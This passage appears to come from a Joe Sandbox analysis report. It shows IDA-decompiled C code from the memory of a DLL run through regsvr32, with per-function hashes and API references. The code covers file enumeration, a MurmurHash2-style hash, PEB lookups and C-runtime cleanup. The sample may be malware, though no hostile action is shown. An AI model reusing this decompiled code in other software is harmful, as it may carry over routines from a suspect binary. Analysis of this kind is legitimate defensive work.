    						__eflags = _t123;
    						if(_t123 != 0) {
    							L12:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E6E9EC27C();
    							asm("int3");
    							_t170 = _t172;
    							_t173 = _t172 - 0x298;
    							_t75 =  *0x6e9fc024; // 0x45ebcfb3
    							_v48 = _t75 ^ _t170;
    							_t138 = _v32;
    							_t156 = _v28;
    							_push(_t126);
    							_push(0);
    							_t160 = _v36;
    							_v648 = _t156;
    							__eflags = _t138 - _t160;
    							if(_t138 != _t160) {
    								while(1) {
    									_t116 =  *_t138;
    									__eflags = _t116 - 0x2f;
    									if(_t116 == 0x2f) {
    										break;
    									}
    									__eflags = _t116 - 0x5c;
    									if(_t116 != 0x5c) {
    										__eflags = _t116 - 0x3a;
    										if(_t116 != 0x3a) {
    											_t138 = E6E9F21B0(_t160, _t138);
    											__eflags = _t138 - _t160;
    											if(_t138 != _t160) {
    												continue;
    											}
    										}
    									}
    									break;
    								}
    								_t156 = _v612;
    							}
    							_t77 =  *_t138;
    							_v605 = _t77;
    							__eflags = _t77 - 0x3a;
    							if(_t77 != 0x3a) {
    								L23:
    								_t127 = 0;
    								__eflags = _t77 - 0x2f;
    								if(__eflags == 0) {
    									L26:
    									_t78 = 1;
    								} else {
    									__eflags = _t77 - 0x5c;
    									if(__eflags == 0) {
    										goto L26;
    									} else {
    										__eflags = _t77 - 0x3a;
    										_t78 = 0;
    										if(__eflags == 0) {
    											goto L26;
    										}
    									}
    								}
    								_v672 = _t127;
    								_v668 = _t127;
    								_push(_t165);
    								asm("sbb eax, eax");
    								_v664 = _t127;
    								_v660 = _t127;
    								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
    								_v656 = _t127;
    								_v652 = _t127;
    								_t84 = E6E9EEB7E(_t138 - _t160 + 1, _t160,  &_v672, E6E9EF092(_t156, __eflags));
    								_t174 = _t173 + 0xc;
    								asm("sbb eax, eax");
    								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
    								__eflags = _t166 - 0xffffffff;
    								if(_t166 != 0xffffffff) {
    									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
    									__eflags = _t143;
    									_t144 = _t143 >> 2;
    									_v644 = _t143 >> 2;
    									do {
    										_v636 = _t127;
    										_v632 = _t127;
    										_v628 = _t127;
    										_v624 = _t127;
    										_v620 = _t127;
    										_v616 = _t127;
    										_t94 = E6E9EEAAF( &(_v604.cFileName),  &_v636,  &_v605, E6E9EF092(_t156, __eflags));
    										_t174 = _t174 + 0x10;
    										asm("sbb eax, eax");
    										_t97 =  !( ~_t94) & _v628;
    										__eflags =  *_t97 - 0x2e;
    										if( *_t97 != 0x2e) {
    											L34:
    											_push(_v612);
    											_t98 = E6E9EED8A(_t144, _t166, _t97, _t160, _v640);
    											_t174 = _t174 + 0x10;
    											_v648 = _t98;
    											__eflags = _t98;
    											if(_t98 != 0) {
    												__eflags = _v616 - _t127;
    												if(_v616 != _t127) {
    													E6E9EDC0E(_v628);
    													_t98 = _v648;
    												}
    												_t127 = _t98;
    											} else {
    												goto L35;
    											}
    										} else {
    											_t144 =  *((intOrPtr*)(_t97 + 1));
    											__eflags = _t144;
    											if(_t144 == 0) {
    												goto L35;
    											} else {
    												__eflags = _t144 - 0x2e;
    												if(_t144 != 0x2e) {
    													goto L34;
    												} else {
    													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
    													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
    														goto L35;
    													} else {
    														goto L34;
    													}
    												}
    											}
    										}
    										L43:
    										FindClose(_t166);
    										goto L44;
    										L35:
    										__eflags = _v616 - _t127;
    										if(_v616 != _t127) {
    											E6E9EDC0E(_v628);
    											_pop(_t144);
    										}
    										__eflags = FindNextFileW(_t166,  &_v604);
    									} while (__eflags != 0);
    									_t106 = _v612;
    									_t149 = _v644;
    									_t156 =  *_t106;
    									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
    									__eflags = _t149 - _t109;
    									if(_t149 != _t109) {
    										E6E9F1BC0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E6E9EE9E5);
    									}
    									goto L43;
    								} else {
    									_push(_v612);
    									_t127 = E6E9EED8A( &_v604, _t166, _t160, _t127, _t127);
    								}
    								L44:
    								__eflags = _v652;
    								_pop(_t165);
    								if(_v652 != 0) {
    									E6E9EDC0E(_v664);
    								}
    								_t100 = _t127;
    							} else {
    								__eflags = _t138 - _t160 + 1;
    								if(_t138 == _t160 + 1) {
    									_t77 = _v605;
    									goto L23;
    								} else {
    									_push(_t156);
    									_t100 = E6E9EED8A(_t138, _t165, _t160, 0, 0);
    								}
    							}
    							_pop(_t161);
    							__eflags = _v12 ^ _t170;
    							_pop(_t128);
    							return E6E9E9ADF(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
    						} else {
    							goto L7;
    						}
    					}
    				} else {
    					_t121 = 0xc;
    					L4:
    					return _t121;
    				}
    			}



































































    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 87635bd228e0d5d0f6041a31450a79ad8cf1f669e9806e15bf7f368ba9ce3e63
    • Instruction ID: 6837f79aadd4006e297e83a43faa0ff2430ebda3b163d3316208abb56a09e16b
    • Opcode Fuzzy Hash: 87635bd228e0d5d0f6041a31450a79ad8cf1f669e9806e15bf7f368ba9ce3e63
    • Instruction Fuzzy Hash: D14191B5C04219AEDB15CFA9CC88AEABBBDAF85304F1446DDE51DE3200DA31DE848F50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EFE17() {
    				signed int _t3;
    
    				_t3 = GetProcessHeap();
    				 *0x6e9fd9d8 = _t3;
    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
    			}




    0x6e9efe17
    0x6e9efe1f
    0x6e9efe27

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: 435e0ad379f7b39f371149c364294953c2d7db2ec8425a394c944e5a3f618309
    • Instruction ID: 867d6837f88125b85f4e104aec9cec090dc863fc8119897fae785fffb38cbdef
    • Opcode Fuzzy Hash: 435e0ad379f7b39f371149c364294953c2d7db2ec8425a394c944e5a3f618309
    • Instruction Fuzzy Hash: 72A001B060AA018B9B508F75A6893093AA9AF466D5719806AA54AC9251EB2488909A41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E8C90(signed char* _a4, signed int _a8, unsigned int _a12) {
    				unsigned int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed char* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    
    				_v32 = 0x5bd1e995;
    				_v36 = 0x18;
    				_v20 = _a8;
    				_v24 = _a4;
    				_v8 = _a12;
    				while(_a8 >= 4) {
    					_v16 =  *_v24;
    					_v16 = _v16 * 0x5bd1e995;
    					_v16 = _v16 >> 0x00000018 ^ _v16;
    					_v16 = _v16 * 0x5bd1e995;
    					_v8 = _v8 * 0x5bd1e995;
    					_v8 = _v8 ^ _v16;
    					_v24 =  &(_v24[4]);
    					_a8 = _a8 - 4;
    				}
    				_v12 = 0;
    				_v28 = _a8;
    				if(_v28 == 1) {
    					L9:
    					_v12 =  *_v24 & 0x000000ff ^ _v12;
    				} else {
    					if(_v28 == 2) {
    						L8:
    						_v12 = (_v24[1] & 0x000000ff) << 0x00000008 ^ _v12;
    						goto L9;
    					} else {
    						if(_v28 == 3) {
    							_v12 = ( *(_v24 + (1 << 1)) & 0x000000ff) << 0x00000010 ^ _v12;
    							goto L8;
    						} else {
    						}
    					}
    				}
    				_v12 = _v12 * 0x5bd1e995;
    				_v12 = _v12 >> 0x00000018 ^ _v12;
    				_v12 = _v12 * 0x5bd1e995;
    				_v8 = _v8 * 0x5bd1e995;
    				_v8 = _v8 ^ _v12;
    				_v20 = _v20 * 0x5bd1e995;
    				_v20 = _v20 >> 0x00000018 ^ _v20;
    				_v20 = _v20 * 0x5bd1e995;
    				_v8 = _v8 * 0x5bd1e995;
    				_v8 = _v8 ^ _v20;
    				_v8 = _v8 >> 0x0000000d ^ _v8;
    				_v8 = _v8 * 0x5bd1e995;
    				_v8 = _v8 >> 0x0000000f ^ _v8;
    				return _v8;
    			}












    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
    • Instruction ID: 56df549dca56209b34109c28b2645b44d3bcda41dd745ec47cbaf65b0c175d79
    • Opcode Fuzzy Hash: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
    • Instruction Fuzzy Hash: E9519BB0D00219EFCB48CF99D6919AEFBB5EF49300F2085AAD951AB350D734AB41DF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EE9B4(void* __ecx) {
    				char _v8;
    				intOrPtr _t7;
    				char _t13;
    
    				_t13 = 0;
    				_v8 = 0;
    				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
    				_t16 =  *((intOrPtr*)(_t7 + 8));
    				if( *((intOrPtr*)(_t7 + 8)) < 0) {
    					L2:
    					_t13 = 1;
    				} else {
    					E6E9EDE3D(_t16,  &_v8);
    					if(_v8 != 1) {
    						goto L2;
    					}
    				}
    				return _t13;
    			}







    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8d29695600689807b11558e5c6e6a4222949c1000ade68193d81d4f01b1a44bb
    • Instruction ID: d81de2419f0a2210c86039b1835a478a3187b1752e26c290517f223a240a7879
    • Opcode Fuzzy Hash: 8d29695600689807b11558e5c6e6a4222949c1000ade68193d81d4f01b1a44bb
    • Instruction Fuzzy Hash: 80E08C33911238EBCB12CBD8C904A8AB3ECEF84A40B1108ABB601D3610C370DE00CFC0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E83B0() {
    
    				return  *((intOrPtr*)( *[fs:0x30] + 0x18));
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
    • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
    • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
    • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E1710() {
    
    				return  *[fs:0x30];
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
    • Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
    • Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
    • Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9F0367(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0x6e9fc708) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E6E9EDC0E(_t46);
    							E6E9F180D( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E6E9EDC0E(_t47);
    							E6E9F190B( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E6E9EDC0E( *((intOrPtr*)(_t74 + 0x7c)));
    						E6E9EDC0E( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E6E9F04D8( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0x6e9fc1d8) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E6E9EDC0E(_t31);
    							E6E9EDC0E( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E6E9EDC0E(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E6E9EDC0E(_t74);
    			}

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6E9F03AB
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F182A
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F183C
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F184E
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1860
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1872
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1884
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1896
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18A8
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18BA
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18CC
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18DE
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18F0
      • Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1902
    • _free.LIBCMT ref: 6E9F03A0
      • Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
      • Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36
    • _free.LIBCMT ref: 6E9F03C2
    • _free.LIBCMT ref: 6E9F03D7
    • _free.LIBCMT ref: 6E9F03E2
    • _free.LIBCMT ref: 6E9F0404
    • _free.LIBCMT ref: 6E9F0417
    • _free.LIBCMT ref: 6E9F0425
    • _free.LIBCMT ref: 6E9F0430
    • _free.LIBCMT ref: 6E9F0468
    • _free.LIBCMT ref: 6E9F046F
    • _free.LIBCMT ref: 6E9F048C
    • _free.LIBCMT ref: 6E9F04A4
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: c9572019c7da83003c4341cf507d30882606d842be21c85db24bb7a59c903297
    • Instruction ID: c2eb77726e84319933727047bb88f346897cfff9220fe5817232d387ecb4e4f7
    • Opcode Fuzzy Hash: c9572019c7da83003c4341cf507d30882606d842be21c85db24bb7a59c903297
    • Instruction Fuzzy Hash: 24318E71604305DFEB629AF9D941B8E73EDAF80354F10892AE565D7650EFB0E881CF60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E6E9EB0CB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
    				signed char* _v0;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				void _v64;
    				signed int _v68;
    				char _v84;
    				intOrPtr _v88;
    				signed int _v92;
    				intOrPtr _v100;
    				void _v104;
    				intOrPtr* _v112;
    				signed char* _v184;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t202;
    				signed int _t203;
    				char _t204;
    				signed int _t206;
    				signed int _t208;
    				signed char* _t209;
    				signed int _t210;
    				signed int _t211;
    				signed int _t215;
    				void* _t218;
    				signed char* _t221;
    				void* _t223;
    				void* _t225;
    				signed char _t229;
    				signed int _t230;
    				void* _t232;
    				void* _t235;
    				void* _t238;
    				signed char _t245;
    				signed int _t250;
    				void* _t253;
    				signed int* _t255;
    				signed int _t256;
    				intOrPtr _t257;
    				signed int _t258;
    				void* _t263;
    				void* _t268;
    				void* _t269;
    				signed int _t273;
    				signed char* _t274;
    				intOrPtr* _t275;
    				signed char _t276;
    				signed int _t277;
    				signed int _t278;
    				intOrPtr* _t280;
    				signed int _t281;
    				signed int _t282;
    				signed int _t287;
    				signed int _t294;
    				signed int _t295;
    				signed int _t298;
    				signed int _t300;
    				signed char* _t301;
    				signed int _t302;
    				signed int _t303;
    				signed int* _t305;
    				signed char* _t308;
    				signed int _t318;
    				signed int _t319;
    				signed int _t321;
    				signed int _t330;
    				void* _t332;
    				void* _t334;
    				void* _t335;
    				void* _t336;
    				void* _t337;
    
    				_t300 = __edx;
    				_push(_t319);
    				_t305 = _a20;
    				_v20 = 0;
    				_v28 = 0;
    				_t279 = E6E9EC03D(_a8, _a16, _t305);
    				_t335 = _t334 + 0xc;
    				_v12 = _t279;
    				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
    					L66:
    					_t202 = E6E9ED547(_t274, _t279, _t300, _t305, _t319);
    					asm("int3");
    					_t332 = _t335;
    					_t336 = _t335 - 0x38;
    					_push(_t274);
    					_t275 = _v112;
    					__eflags =  *_t275 - 0x80000003;
    					if( *_t275 == 0x80000003) {
    						return _t202;
    					} else {
    						_push(_t319);
    						_push(_t305);
    						_t203 = E6E9EAD86(_t275, _t279, _t300, _t305, _t319);
    						__eflags =  *(_t203 + 8);
    						if( *(_t203 + 8) != 0) {
    							__imp__EncodePointer(0);
    							_t319 = _t203;
    							_t223 = E6E9EAD86(_t275, _t279, _t300, 0, _t319);
    							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
    							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
    								__eflags =  *_t275 - 0xe0434f4d;
    								if( *_t275 != 0xe0434f4d) {
    									__eflags =  *_t275 - 0xe0434352;
    									if( *_t275 != 0xe0434352) {
    										_t215 = E6E9EA645(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
    										_t336 = _t336 + 0x1c;
    										__eflags = _t215;
    										if(_t215 != 0) {
    											L83:
    											return _t215;
    										}
    									}
    								}
    							}
    						}
    						_t204 = _a16;
    						_v28 = _t204;
    						_v24 = 0;
    						__eflags =  *(_t204 + 0xc);
    						if( *(_t204 + 0xc) > 0) {
    							_push(_a24);
    							E6E9EA578(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
    							_t302 = _v40;
    							_t337 = _t336 + 0x18;
    							_t215 = _v44;
    							_v20 = _t215;
    							_v12 = _t302;
    							__eflags = _t302 - _v32;
    							if(_t302 >= _v32) {
    								goto L83;
    							}
    							_t281 = _t302 * 0x14;
    							__eflags = _t281;
    							_v16 = _t281;
    							do {
    								_t282 = 5;
    								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
    								_t337 = _t337 + 0xc;
    								__eflags = _v64 - _t218;
    								if(_v64 > _t218) {
    									goto L82;
    								}
    								__eflags = _t218 - _v60;
    								if(_t218 > _v60) {
    									goto L82;
    								}
    								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
    								_t287 = _t221[4];
    								__eflags = _t287;
    								if(_t287 == 0) {
    									L80:
    									__eflags =  *_t221 & 0x00000040;
    									if(( *_t221 & 0x00000040) == 0) {
    										_push(0);
    										_push(1);
    										E6E9EB04B(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
    										_t302 = _v12;
    										_t337 = _t337 + 0x30;
    									}
    									goto L82;
    								}
    								__eflags =  *((char*)(_t287 + 8));
    								if( *((char*)(_t287 + 8)) != 0) {
    									goto L82;
    								}
    								goto L80;
    								L82:
    								_t302 = _t302 + 1;
    								_t215 = _v20;
    								_t281 = _v16 + 0x14;
    								_v12 = _t302;
    								_v16 = _t281;
    								__eflags = _t302 - _v32;
    							} while (_t302 < _v32);
    							goto L83;
    						}
    						E6E9ED547(_t275, _t279, _t300, 0, _t319);
    						asm("int3");
    						_push(_t332);
    						_t301 = _v184;
    						_push(_t275);
    						_push(_t319);
    						_push(0);
    						_t206 = _t301[4];
    						__eflags = _t206;
    						if(_t206 == 0) {
    							L108:
    							_t208 = 1;
    							__eflags = 1;
    						} else {
    							_t280 = _t206 + 8;
    							__eflags =  *_t280;
    							if( *_t280 == 0) {
    								goto L108;
    							} else {
    								__eflags =  *_t301 & 0x00000080;
    								_t308 = _v0;
    								if(( *_t301 & 0x00000080) == 0) {
    									L90:
    									_t276 = _t308[4];
    									_t321 = 0;
    									__eflags = _t206 - _t276;
    									if(_t206 == _t276) {
    										L100:
    										__eflags =  *_t308 & 0x00000002;
    										if(( *_t308 & 0x00000002) == 0) {
    											L102:
    											_t209 = _a4;
    											__eflags =  *_t209 & 0x00000001;
    											if(( *_t209 & 0x00000001) == 0) {
    												L104:
    												__eflags =  *_t209 & 0x00000002;
    												if(( *_t209 & 0x00000002) == 0) {
    													L106:
    													_t321 = 1;
    													__eflags = 1;
    												} else {
    													__eflags =  *_t301 & 0x00000002;
    													if(( *_t301 & 0x00000002) != 0) {
    														goto L106;
    													}
    												}
    											} else {
    												__eflags =  *_t301 & 0x00000001;
    												if(( *_t301 & 0x00000001) != 0) {
    													goto L104;
    												}
    											}
    										} else {
    											__eflags =  *_t301 & 0x00000008;
    											if(( *_t301 & 0x00000008) != 0) {
    												goto L102;
    											}
    										}
    										_t208 = _t321;
    									} else {
    										_t185 = _t276 + 8; // 0x6e
    										_t210 = _t185;
    										while(1) {
    											_t277 =  *_t280;
    											__eflags = _t277 -  *_t210;
    											if(_t277 !=  *_t210) {
    												break;
    											}
    											__eflags = _t277;
    											if(_t277 == 0) {
    												L96:
    												_t211 = _t321;
    											} else {
    												_t278 =  *((intOrPtr*)(_t280 + 1));
    												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
    												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
    													break;
    												} else {
    													_t280 = _t280 + 2;
    													_t210 = _t210 + 2;
    													__eflags = _t278;
    													if(_t278 != 0) {
    														continue;
    													} else {
    														goto L96;
    													}
    												}
    											}
    											L98:
    											__eflags = _t211;
    											if(_t211 == 0) {
    												goto L100;
    											} else {
    												_t208 = 0;
    											}
    											goto L109;
    										}
    										asm("sbb eax, eax");
    										_t211 = _t210 | 0x00000001;
    										__eflags = _t211;
    										goto L98;
    									}
    								} else {
    									__eflags =  *_t308 & 0x00000010;
    									if(( *_t308 & 0x00000010) != 0) {
    										goto L108;
    									} else {
    										goto L90;
    									}
    								}
    							}
    						}
    						L109:
    						return _t208;
    					}
    				} else {
    					_t274 = _a4;
    					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
    						L22:
    						_t300 = _a12;
    						_v8 = _t300;
    						goto L24;
    					} else {
    						_t319 = 0;
    						if(_t274[0x1c] != 0) {
    							goto L22;
    						} else {
    							_t225 = E6E9EAD86(_t274, _t279, _t300, _t305, 0);
    							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
    								L60:
    								return _t225;
    							} else {
    								_t274 =  *(E6E9EAD86(_t274, _t279, _t300, _t305, 0) + 0x10);
    								_t263 = E6E9EAD86(_t274, _t279, _t300, _t305, 0);
    								_v28 = 1;
    								_v8 =  *((intOrPtr*)(_t263 + 0x14));
